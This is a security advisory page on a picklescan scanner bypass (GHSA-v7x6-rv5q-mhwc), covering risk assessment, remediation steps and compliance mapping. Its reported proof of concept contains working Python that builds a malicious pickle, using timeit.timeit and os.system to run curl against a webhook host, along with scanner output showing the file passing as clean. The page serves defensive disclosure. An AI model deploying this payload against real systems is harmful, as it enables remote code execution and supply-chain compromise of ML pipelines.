GHSA-v7x6-rv5q-mhwc: picklescan: bypass allows silent RCE in ML pipelines

GHSA-v7x6-rv5q-mhwc MEDIUM
Published April 7, 2025
CISO Take

picklescan's pickle safety scanner can be trivially bypassed using Python's built-in timeit module, rendering any 'clean' scan result untrustworthy for model files scanned with versions below 0.0.25. Update to 0.0.25 immediately and re-scan all previously approved model artifacts — any model cleared by the old scanner should be treated as unverified. Do not rely on picklescan as a sole gate; enforce sandboxed model loading and cryptographic provenance verification as defense-in-depth.

Risk Assessment

Effective risk is HIGH despite the medium CVSS rating. The vulnerability is trivially exploitable (PoC is public, requires no special skills), directly undermines a security control that organizations explicitly trust for ML supply chain protection, and creates a false sense of safety that is more dangerous than having no scanner at all. PyTorch ecosystem adoption is widespread in enterprise ML, meaning the blast radius of a successful supply chain campaign is significant. The real severity is masked by CVSS methodology not capturing the 'security control bypass' multiplier.

Affected Systems

Package Ecosystem Vulnerable Range Patched
picklescan pip < 0.0.25 0.0.25
401 3 dependents Pushed 2mo ago 95% patched ~12d to patch Full package profile →

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Recommended Action

5 steps
  1. PATCH

    Upgrade picklescan to >= 0.0.25 immediately across all environments.

  2. RE-SCAN: Re-run picklescan on all model artifacts previously cleared by older versions — treat prior approvals as void.

  3. AUDIT

    Identify all pipelines, scripts, and platforms that invoke picklescan and verify the version in use.

  4. DEFENSE-IN-DEPTH: Do not rely solely on picklescan — add model loading isolation (subprocess sandboxing, gVisor/seccomp, network-isolated containers) and enforce cryptographic signing + provenance verification (e.g., Sigstore) for all model artifacts.

  5. DETECTION

    Alert on unexpected outbound connections from model-loading processes; the PoC uses curl to a webhook, which is detectable via egress filtering and DNS monitoring.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity Art. 9 - Risk management system
ISO 42001
A.6.1.2 - AI supply chain management
NIST AI RMF
GOVERN 1.2 - Policies and processes addressing AI risk MEASURE 2.7 - AI system security and resilience evaluated
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-v7x6-rv5q-mhwc?

picklescan's pickle safety scanner can be trivially bypassed using Python's built-in timeit module, rendering any 'clean' scan result untrustworthy for model files scanned with versions below 0.0.25. Update to 0.0.25 immediately and re-scan all previously approved model artifacts — any model cleared by the old scanner should be treated as unverified. Do not rely on picklescan as a sole gate; enforce sandboxed model loading and cryptographic provenance verification as defense-in-depth.

Is GHSA-v7x6-rv5q-mhwc actively exploited?

No confirmed active exploitation of GHSA-v7x6-rv5q-mhwc has been reported, but organizations should still patch proactively.

How to fix GHSA-v7x6-rv5q-mhwc?

1. PATCH: Upgrade picklescan to >= 0.0.25 immediately across all environments. 2. RE-SCAN: Re-run picklescan on all model artifacts previously cleared by older versions — treat prior approvals as void. 3. AUDIT: Identify all pipelines, scripts, and platforms that invoke picklescan and verify the version in use. 4. DEFENSE-IN-DEPTH: Do not rely solely on picklescan — add model loading isolation (subprocess sandboxing, gVisor/seccomp, network-isolated containers) and enforce cryptographic signing + provenance verification (e.g., Sigstore) for all model artifacts. 5. DETECTION: Alert on unexpected outbound connections from model-loading processes; the PoC uses curl to a webhook, which is detectable via egress filtering and DNS monitoring.

What systems are affected by GHSA-v7x6-rv5q-mhwc?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps/CI-CD pipelines, model registries, data science workstations.

What is the CVSS score for GHSA-v7x6-rv5q-mhwc?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary Using timeit.timeit() function, which is a built-in python library function to execute remote pickle file. ### Details Pickle’s deserialization process is known to allow execution of function via reduce method. While Picklescan is meant to detect such exploits, this attack evades detection by calling built-in python library function like **timeit.timeit()**. And since timeit library wasn't inside unsafe globals blacklist, it may not raise red flag in the security scan. The attack payload executes in the following steps: First, the attacker craft the payload by calling to **timeit.timeit()** function from timeit library in __reduce__ method Then, inside reduce method, the attacker import dangerous libarary like os and calling **os.system()** to run OS commands, for example: curl command. And then the attacker send this malicious pickle file to the victim. Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC 1. The attacker crafted a malicious pickle file using built-in python library function timeit.timeit() ``` import pickle import timeit class Payload(object): def __reduce__(self): return timeit.timeit, ('','import os; os.system("curl https://webhook.site/95f3e1c3-ee37-4a5a-8544-ab4ce93475f6")') def create_payload(): with open('payload.pickle', 'wb') as f: pickle.dump(Payload(), f) create_payload() ``` Then the attacker will send this pickle file to the victim computer and maybe the victim load this pickle using pickle.load() 2. The victim will use picklescan library to check out if the received pickle file is malicious or not ``` picklescan -p payload.pickle ----------- SCAN SUMMARY ----------- Scanned files: 1 Infected files: 0 Dangerous globals: 0 ``` 3. Beliving that this pickle file is safe using modelscan, the victim then load this pickle file which will trigger timeit.timeit command to execute OS commands (in my example, it was curl command) ``` import pickle def load_payload(): with open('payload.pickle', 'rb') as f: pickle.load(f) load_payload() ``` ### Impact Severity: High Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects. ### Recommended Solution I suggest adding timeit library to the unsafe globals blacklist.

Exploitation Scenario

An attacker targets an organization's MLOps pipeline. They craft a malicious PyTorch model file where the __reduce__ method calls timeit.timeit() with an embedded OS command (e.g., a reverse shell or data exfiltration via curl). They contribute this model to a public Hugging Face repo or submit it as a 'pretrained checkpoint' via a pull request to an open-source project. A downstream organization's CI/CD pipeline clones the model, runs picklescan for safety validation, gets 'Infected files: 0', and proceeds to load the model in a staging or production training environment. Upon pickle.load(), the timeit call executes the embedded OS command with the privileges of the model-loading process — achieving RCE inside the ML infrastructure, typically with broad access to training data, API keys, and internal services.

Timeline

Published
April 7, 2025
Last Modified
April 7, 2025
First Seen
March 24, 2026

Related Vulnerabilities